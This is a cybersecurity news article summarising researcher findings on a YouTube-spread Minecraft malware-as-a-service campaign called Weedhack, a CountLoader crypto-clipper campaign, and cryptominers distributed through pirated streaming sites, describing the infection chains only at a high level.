Cybersecurity researchers have flagged a new campaign targeting Minecraft players via YouTube to spread malware capable of gaining control of victims’ systems.
The Minecraft-focused malware-as-a-service (MaaS) campaign has been codenamed Weedhack by McAfee Labs, stating the activity has been active since January 2026 and impersonates Minecraft clients and mods to infect users. In all, 3820 unique malicious JAR files and over 240 URLs responsible for distributing the malware have been identified.
“This campaign utilizes SEO poisoning and YouTube to generate traffic to these malicious URLs,” security researcher Aayush Tyagi said. “We also found two YouTube channels and multiple videos that demonstrate Minecraft Mods and Clients and redirect viewers to these URLs.”
Central to the campaign is an enterprise-grade dashboard (“weedhack[.]to”) that enables customers to view stolen credentials and system information, as well as remotely keep tabs on the compromised systems. Furthermore, it allows criminals to create custom payloads that can target Minecraft versions 1.21.0 to 1.21.11, not to mention inject the malware into legitimate Minecraft mods.
The starting point of the attack is a malicious JAR file (“DonutDupe.jar”) downloaded from the malicious websites. The file then retrieves details of the command-and-control (C2) server domain using a known technique called EtherHiding, which employs the Ethereum blockchain as a dead drop resolver.
In the next stage, the malware contacts the C2 server to fetch another Java-based JAR payload (“Elevator.jar”) that collects system information, configures Microsoft Defender exclusions, and serves as a conduit for dropping two additional JAR payloads. The third JAR payload (“SecurityManager.jar”) establishes persistence and acts as a stager for the final component (“Component.jar”) that deploys the remote access features.
The threat actors behind the tooling leverage a Telegram channel to advertise their warez, broadcast updates, and provide customer support. The channel has more than 850 members. The tool, for its part, comes in two tiers –
- Free, which includes a comprehensive infostealer that can target Minecraft session IDs and four Minecraft launchers; capture screenshots; and harvest files, system information, cookies, and passwords from 36 different web browsers, data from 56 browser-based cryptocurrency wallets and 12 desktop wallet apps, and credentials for Discord, Steam, and Telegram.
- Premium, which starts at $4.99 per month (or $24.99 for a lifetime license) and offers additional remote access capabilities, such as webcam access, keylogging, reverse shell execution, screen sharing with keyboard and mouse access, and file uploads and downloads.
Attack chains revolve around SEO poisoning and YouTube videos containing descriptions that embed links to malicious Minecraft Clients to target unsuspecting users. The majority of Weedhack infections have been identified in the U.S., followed by Germany, India, the U.K., Italy, Vietnam, Canada, Norway, Sweden, Finland, and Spain.
“One of the key features that makes Weedhack unique is that it is hosted on the clear net and provides access to sophisticated malware for free,” Tyagi said. “This difference in cost and ease of access with detailed tutorials on how to use the malware significantly reduces the barrier to entry for prospective customers. Furthermore, its ability to steal Minecraft accounts attracts a younger audience. Both of these factors complement each other and make the campaign much more lethal.”
McAfee Labs said it has also observed the malware acting as a trigger for cyberbullying, where the customers, who appear to be teenagers and young adults, are weaponizing its remote access capabilities to threaten, harass, and monitor their victims. They have found a way to record victims via their webcams and shared the videos on the Telegram channel as “trophies.”
CountLoader Delivers Crypto Clipper
The disclosure comes as the cybersecurity company sheds light on a large-scale CountLoader campaign that’s estimated to have compromised 86,000 unique machines. CountLoader is a JavaScript loader that’s typically distributed via cracked software distribution sites. It’s known to deploy various payloads like Cobalt Strike, AdaptixC2, PureHVNC RAT, Amatera Stealer, and PureMiner.
Of these compromises, approximately 9,000 infections are said to have resulted from the malware spreading via USB drives and removable media. McAfee Labs said the highest number of infections was observed in India, followed by Indonesia, the U.S., and several countries across Southeast Asia, adding it was able to successfully sinkhole the malware communication infrastructure by registering a fake C2 domain.
“The infection begins when an EXE file is executed,” the company said. “This file launches a PowerShell command, which downloads and executes an obfuscated JavaScript loader known as CountLoader. The loader is executed using ‘mshta.exe.'”
Once executed, CountLoader sets up persistence, communicates with the C2 server, attempts to spread via USB drives, and awaits further instructions from the C2 server to download and execute payloads. The final payload deployed in the latest set of attacks is a cryptocurrency clipper malware that hijacks clipboard content to redirect cryptocurrency transactions.
Pirated Content Leads to Cryptocurrency Miners
The findings also follow the discovery of a years-long campaign that has used illegal movie and TV show streaming sites to distribute a cryptocurrency miner under the guise of a fake update for a video player plugin. The bogus update downloads a ZIP archive, which then uses DLL side-loading to drop a fork of SilentCryptoMiner.
The malware is equipped with a wide range of capabilities –
- Configure Defender exclusions, terminate Microsoft’s Malicious Software Removal Tool, and disable automatic hibernation and sleep mode to maximize the miner’s potential runtime on the device.
- Repeatedly trigger User Account Control (UAC) prompts until the process is successfully executed with elevated privileges.
- Initiate a watchdog component that ensures the uninterrupted operation of the miner.
- Run a RAT agent that provides remote control capabilities, including running arbitrary commands, launching EXE files using “explorer.exe,” and running shellcode.
- Launch an XMRig-based CPU and a GPU miner.
“The archive contained a legitimate executable, HLS Installer.874.exe, alongside a malicious DLL. Launching the EXE triggered a DLL side-loading mechanism, injecting the malicious module into a legitimate program process and executing code within its context,” Kaspersky said. “The library contained the logic for deploying the miner and establishing persistence on the device.”
It’s assessed that the activity is a continuation of a campaign that was documented by NTT Security in April 2023, which used fake browser crash warnings to drop the miner.
“The threat actors leverage a variety of sites, ranging from online libraries to movie and TV show streaming platforms,” Kaspersky said. “There is no telling what channels they will use to distribute the malicious archive in the future. However, the current case shows that users visiting pirated websites continue to take a serious risk.”
